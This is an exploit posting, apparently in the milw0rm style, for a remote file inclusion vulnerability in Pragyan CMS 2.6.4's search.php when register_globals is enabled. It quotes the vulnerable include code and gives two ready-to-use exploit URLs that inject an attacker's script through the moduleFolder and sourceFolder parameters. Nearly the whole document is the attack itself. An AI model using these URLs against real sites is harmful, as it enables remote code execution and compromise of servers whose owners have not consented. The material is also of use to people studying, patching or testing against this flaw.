###################### Author: #############################
Author: Mr.SeCreT
E-mail: g-ff@hotmail.com<mailto:g-ff@hotmail.com>
From: Syria
Greeting To: Milw0rm
############## Script Information: #########################
Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability
Language: PHP
Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4.tar.gz
register_globals = On
 
################### Vul Code: ##############################
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
 
################### Exploit: ###############################
www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil> Script]
www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil<http://www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil> Script]
 
############################################################
The End